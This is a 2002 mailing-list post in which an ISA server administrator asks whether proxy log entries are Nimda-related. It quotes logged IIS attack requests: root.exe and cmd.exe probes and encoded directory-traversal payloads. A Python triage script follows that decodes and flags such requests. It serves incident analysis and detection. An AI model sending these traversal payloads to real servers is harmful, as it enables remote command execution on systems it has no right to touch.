Any ideas on this entry in my Web proxy log?

  • From: "Rogers, Brian" <RogersB@xxxxxxxxxxxxxx>
  • To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
  • Date: Wed, 9 Jan 2002 17:38:34 -0500

I'm finding a lot of these in my Web Proxy log on my ISA server from various
external IP addresses.  Would this be Nimda/Goner/etc. related?

My ISA server does not even run IIS.

12.14.65.42     anonymous       -       2002-01-09      16:40:24        ISASERVER       -       www     -       -       -       72      -       -       GET     http://www/scripts/root.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:25        ISASERVER       -       www     -       -       -       70      -       -       GET     http://www/MSADC/root.exe?/c+dir        -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:25        ISASERVER       -       www     -       -       -       80      -       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:25        ISASERVER       -       www     -       -       -       80      -       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26        ISASERVER       -       www     -       -       -       96      -       -       GET     http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26        ISASERVER       -       www     -       -       -       117     -       -       GET     http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26        ISASERVER       -       www     -       -       -       117     -       -       GET     http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26        ISASERVER       -       www     -       -       -       145     -       -       GET     http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27        ISASERVER       -       www     -       -       -       97      -       -       GET     http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27        ISASERVER       -       www     -       -       -       97      -       -       GET     http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27        ISASERVER       -       www     -       -       -       97      -       -       GET     http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27        ISASERVER       -       www     -       -       -       97      -       -       GET     http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28        ISASERVER       -       www     -       -       -       98      -       -       GET     http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28        ISASERVER       -       www     -       -       -       96      -       -       GET     http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28        ISASERVER       -       www     -       -       -       100     -       -       GET     http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28        ISASERVER       -       www     -       -       -       96      -       -       GET     http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -       12202

Brian W. Rogers
MCSE, MCT, MCP
Client/Server Network Developer
Tree of Life Corporation
rogersb@xxxxxxxxxxxxxx
office: (904)940-2152
mobile: (904)806-7173
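
An added example, not part of the original post: a small triage script that percent-decodes each requested URL in layers and flags the request shapes seen in the log above (cmd.exe/root.exe requests, double-encoded traversal such as `%255c`, and overlong UTF-8 sequences such as `%c0%af`). The function names, finding labels and the trimmed line layout (client IP, method, URL) are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Sample lines: four entries from the log above (wrapped lines joined, fields
# trimmed to client IP, method, URL) plus one constructed benign request.
SAMPLE_LOG = """\
12.14.65.42 GET http://www/scripts/root.exe?/c+dir
12.14.65.42 GET http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
12.14.65.42 GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
12.14.65.42 GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
10.0.0.5 GET http://www/default.htm
"""

SHELL = re.compile(rb"/(?:cmd|root)\.exe\?", re.I)
TRAVERSAL = re.compile(rb"\.\.[/\\]")
OVERLONG = re.compile(rb"[\xc0\xc1]")  # these bytes never occur in valid UTF-8

def decode_layers(url, max_rounds=4):
    """Percent-decode repeatedly and return every intermediate form."""
    forms = [url.encode("ascii", "replace")]
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(forms[-1])
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    return forms

def classify(url):
    """Return the set of findings for one requested URL."""
    forms = decode_layers(url)
    hits = lambda f: len(TRAVERSAL.findall(f))
    findings = set()
    if SHELL.search(forms[-1]):
        findings.add("shell-binary")
    if any(OVERLONG.search(f) for f in forms[1:]):
        findings.add("overlong-utf8")
    # A second decode pass that exposes new "../" or "..\" means double encoding.
    if len(forms) > 2 and hits(forms[-1]) > hits(forms[1]):
        findings.add("double-encoded-traversal")
    return findings

def scan(log_text):
    """Map client IP -> number of flagged requests."""
    flagged = {}
    for line in log_text.splitlines():
        m = re.match(r"(\S+)\s.*?\bGET\s+(\S+)", line)
        if m and classify(m.group(2)):
            flagged[m.group(1)] = flagged.get(m.group(1), 0) + 1
    return flagged

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The overlong check is a heuristic: URLs carrying Latin-1 encoded text can also contain bytes 0xC0 or 0xC1.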

